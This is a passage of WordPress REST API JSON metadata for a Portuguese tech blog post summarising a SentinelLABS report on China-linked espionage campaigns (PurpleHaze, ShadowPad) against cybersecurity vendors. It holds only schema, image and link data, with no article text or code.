Devteria.io","isPartOf":{"@id":"https:\/\/devteriaio.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#primaryimage"},"image":{"@id":"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#primaryimage"},"thumbnailUrl":"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/cibersecurity1.png","datePublished":"2025-06-10T01:36:41+00:00","description":"SentinelLABS revela campanha cont\u00ednua de ciberespionagem ligada \u00e0 China contra fornecedores de ciberseguran\u00e7a e outras 70+ organiza\u00e7\u00f5es. Confira detalhes, impacto e recomenda\u00e7\u00f5es.","breadcrumb":{"@id":"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#primaryimage","url":"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/cibersecurity1.png","contentUrl":"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/cibersecurity1.png","width":1024,"height":507},{"@type":"BreadcrumbList","@id":"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/devteriaio.com\/"},{"@type":"ListItem","position":2,"name":"Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram fornecedores"}]},{"@type":"WebSite","@id":"https:\/\/devteriaio.com\/#website","url":"https:\/\/devteriaio.com\/","name":"DEVTERIA.io","description":"Seu blog de tecnologia","publisher":{"@id":"https:\/\/devteriaio.com\/#\/schema\/person\/2d7d984adb6457833fd39737aa53ac66"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/devteriaio.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":["Person","Organization"],"@id":"https:\/\/devteriaio.com\/#\/schema\/person\/2d7d984adb6457833fd39737aa53ac66","name":"Raphael Giusti","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/devteriaio.com\/#\/schema\/person\/image\/","url":"https:\/\/devteriaio.com\/wp-content\/uploads\/2024\/09\/1000000046-edited.png","contentUrl":"https:\/\/devteriaio.com\/wp-content\/uploads\/2024\/09\/1000000046-edited.png","width":500,"height":281,"caption":"Raphael Giusti"},"logo":{"@id":"https:\/\/devteriaio.com\/#\/schema\/person\/image\/"},"sameAs":["http:\/\/devteriaio.com"],"url":"https:\/\/devteriaio.com\/index.php\/author\/devteria-io\/"}]}},"_links":{"self":[{"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/wp\/v2\/posts\/318","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/wp\/v2\/comments?post=318"}],"version-history":[{"count":2,"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/wp\/v2\/posts\/318\/revisions"}],"predecessor-version":[{"id":323,"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/wp\/v2\/posts\/318\/revisions\/323"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/wp\/v2\/media\/319"}],"wp:attachment":[{"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/wp\/v2\/media?parent=318"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/wp\/v2\/categories?post=318"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/wp\/v2\/tags?post=318"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}